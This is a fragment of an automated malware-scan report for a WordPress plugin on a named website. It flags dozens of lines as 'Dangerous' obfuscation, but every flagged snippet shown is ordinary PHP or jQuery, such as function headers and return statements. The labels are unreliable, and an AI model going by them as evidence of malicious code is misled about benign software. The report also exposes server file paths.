</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 129</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 141</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 153</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">debug_link</span><span style="color: #007700">( </span><span style="color: #0000BB">$text </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 167</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$text</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 17</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_get_option</span><span style="color: #007700">( </span><span style="color: #0000BB">$request </span><span style="color: #007700">= </span><span style="color: #0000BB">false </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 183</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$link</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 192</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_admin_scripts_updater</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 20</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$bsf_options</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 22</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return ( isset( </span><span style="color: #0000BB">$bsf_options</span><span style="color: #007700">[ </span><span style="color: #0000BB">$request </span><span style="color: #007700">] ) ) ? </span><span style="color: #0000BB">$bsf_options</span><span style="color: #007700">[ </span><span style="color: #0000BB">$request </span><span style="color: #007700">] : </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 26</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_update_option' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 28</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">to update options</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 306</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_brainstorm_menu</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 328</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_get_free_menu_position' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 35</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_update_option</span><span style="color: #007700">( </span><span style="color: #0000BB">$request</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 38</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">update_option</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_options'</span><span style="color: #007700">, </span><span style="color: #0000BB">$bsf_options </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 42</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_dismiss_notice' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 44</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">to dismiss notice</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 468</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">load_opn</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 480</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_icon_manager_menu</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 490</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">load_modules</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 499</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">load_dashboard</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 49</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_dismiss_notice</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 508</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">load_about</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 517</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">load_smoothscroll</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 526</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">load_scripts_styles</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 535</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">product_license</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 544</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">load_debug_settings</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 553</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_resources</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 563</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_google_maps_dashboard</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 572</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">update_modules</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 59</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_core_check' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 606</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">can_access_admin</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 61</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">core bsf</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 620</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$user_role</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 630</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">update_debug_settings</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 66</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_core_check</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 743</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">update_settings</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 75</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_core_admin_notice' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 779</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">update_css_options</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 77</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">to admin notice</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 813</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">display_notice</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 82</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_core_admin_notice</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 85</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function($){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 86</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 87</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 919</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_generate_rand_id</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 928</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$myKeeper</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 932</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">wp_remote_get</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 938</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_remote_get</span><span style="color: #007700">( </span><span style="color: #0000BB">$path </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 940</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'curl_init' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 947</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">the transfer </span><span style="color: #007700">as </span><span style="color: #0000BB">a string</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 948</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RETURNTRANSFER</span><span style="color: #007700">, </span><span style="color: #0000BB">1 </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 957</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 975</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_bsf_core_style_hooks</span><span style="color: #007700">( </span><span style="color: #0000BB">$hooks </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 97</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">response</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 991</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$hooks</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_get_option' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_505").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/admin/dashboard.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.68 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:21</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 4</span><br><table id="file_506" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function() { </span><span style="color: #FF8000">// Hover out code jQuery(this).attr('title', jQuery(this).data('tipText')); jQuery('.tooltip').remove(); }).mousemove(function(e) { var mousex = e.pageX + 20; //Get X coordinates var mousey = e.pageY + 10; //Get Y coordinates jQuery('.tooltip') .css({ to</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 110</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 112</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 124</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">e</span><span style="color: #007700">) {</span>
</span>
